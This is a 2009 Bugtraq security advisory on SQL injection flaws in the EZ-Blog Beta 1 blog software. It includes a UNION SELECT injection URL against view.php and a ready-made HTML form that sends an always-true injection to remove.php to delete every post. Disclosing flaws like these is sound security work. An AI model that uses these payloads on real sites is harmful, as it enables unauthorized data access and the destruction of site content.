EZ-Blog Beta 1 Multiple SQL Injection
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: EZ-Blog Beta 1 Multiple SQL Injection
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Sun, 1 Mar 2009 23:15:23 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=6efxoKD4iz6jRvEmj5bQPCUVg+tYcugCwnjdt2YkLJg=; b=MN4b2a93eBFOMfmZa7t+QFiDvlcYcMm4K9wF5KHGtNrnocjO11adXgTHXsym6hQuvn YikJ7X8v+GauW+okl27So+GAwNBAvN3C4Ewc5cm2nCz3lISnWNCLSPepObK/80P/imsT 3YXM0fXrBu0LMpRmZqfIj63HpoWucZNBCM3fo=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=DIDcVuO2RK8YXVVoprAUTIOS2EMEWsmLWdKTkUzTj3vSbSbOw/iq7eA0J5KudtAlsD ZdgB16hkkJRaYWO+IxPjvUbLbO7oqq0k6s+UF5FG5FCUvN3gd30dDbK4MmIUs6Oz0ZqN dusmbQ84RKNVA5tuOQfSvYj1yr6+i6W4GUopo=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
Application: EZ-Blog
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
This is a crazy application because it not
require authentication for posting, deleting,
etc. and it is entirely vulnerable to SQL
Injection, as follows:
http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23
There aren't hight reserved information on the
database, but it is possible to cause inconvenience.
The following injection allow to delete all
posts:
<form action="http://site/path/admin/remove.php" method="POST">
<input type="hidden" name="kill" value="1'or'1'='1">
<input type="hidden" name="confirm" value="1">
<input type="hidden" name="rm" value="true">
<input type="submit" value="Exploit">
</form>
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351